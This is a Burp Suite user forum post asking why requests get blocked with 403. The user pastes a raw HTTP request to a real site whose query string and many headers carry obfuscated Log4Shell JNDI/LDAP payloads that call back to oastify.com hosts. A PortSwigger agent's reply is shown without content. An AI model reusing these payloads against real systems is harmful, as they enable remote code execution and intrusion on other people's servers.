Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

i got a 403 every time i proxy true burp

godwin-X | Last updated: Feb 28, 2024 01:06AM UTC

good day buddies pls i got a 403 every time i proxy true burp then check the request and discover that some additional poisonous headers is been added which makes waf to block the request pls any guide on how to fix this issue the request + additional headers GET /en?hey=5002&action=$%7Bjn$%7Blower:d%7Di:l$%7Blower:d%7Dap://$%7Blower:x%7D$%7Blower:f%7D.twt3wkcvtej9ewbplt990z4o8fe7e42t.oastify.com/a%7D/ HTTP/2 Host: orbs.toolsforhumanity.com Cookie: _dd_s= Cache-Control: no-transform Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft Edge";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.6nugnx38kram5922c60mrcv1zs5k5gt5.oastify.com/a} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 From: root@${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.ezhoz5fgwzmuhheaoecu3k79b0hshn5c.oastify.com/a} Cf-Connecting_ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.806i0zgaxtnoibf4p8do4e83cuimik69.oastify.com/a} Forwarded: for=spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.xop7oo4zlibd603tdx1ds3ws0j6b6auz.oastify.com/a};by=spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.xop7oo4zlibd603tdx1ds3ws0j6b6auz.oastify.com/a};host=spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.xop7oo4zlibd603tdx1ds3ws0j6b6auz.oastify.com/a} X-Host: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.b9ll92pd6wwrreo7ybmrdhh6lxrprpfe.oastify.com/a} Contact: root@${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.p9zz9gpr6aw5rsolypm5dvhklbr3r4ft.oastify.com/a} True-Client-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.9pzjp05bmucp7c45e92ptfx41v7n7pve.oastify.com/a} X-Arbitrary: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.dfwnf4vfcy2txgu94dstjjn8rzxrxulj.oastify.com/a}/ X-Forwarded-Server: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.jf2tfavlc42zxmuf4jszjpner5xxx1lq.oastify.com/a} X-Client-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.alzkl11civ8q3d06aayqpgt5xw3o3tri.oastify.com/a} Proxy-Host: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.76bh6ym93stnoal3v7jnade2itolpbd0.oastify.com/a} Profile: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.im8sm92kj39y4l1ebizyqoudy44w5ntc.oastify.com/a}/wap.xml Client-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.bwblw2cdtwjreeb7lb9r0h468xepfh36.oastify.com/a} Via: 1.1 ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.dm3nm42fjy9t4g19bdztqju8yz4r5kt9.oastify.com/a} X-Real-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.4uzeuva6rphkc790j47kya2z6qcidc11.oastify.com/a} X-Api-Version: : ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.wnn6nn3ykhac5z2scw0cr2vrzi5a65uu.oastify.com/a} X-Forwarded-Proto: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.eewoe5ugbz1uwhta3eruikm9q0wsxold.oastify.com/a}/header, Referer: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.d6kn64mf3yttogl9vdjtaje8izorpodd.oastify.com/a}/ref X-Forwarded-For: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.v5155mlx2gsbnykruvib91dqhhn9o7cw.oastify.com/a} X-Originating-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.rup1uiatrch7cu9njr77yx2m6dc5d41t.oastify.com/a} X-Wap-Profile: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.rwr1wicttcj7eubnlr970x4m8de5f53u.oastify.com/a}/wap.xml X-Http-Destinationurl: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.bkzlk20dhw7r2ez79bxrohs6wx2p3qrf.oastify.com/a}/ Destination: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.ywy8wpc0tjjee1buly9e044t8kecfe33.oastify.com/a} Proxy: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.y6586pm03jteo1luvyjea4etikocpfd4.oastify.com/a} X-Original-Url: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.jk7tka0lh47z2mzf9jxzopsew52x31rq.oastify.com/a}/

Dominyque, PortSwigger Agent | Last updated: Feb 28, 2024 07:40AM UTC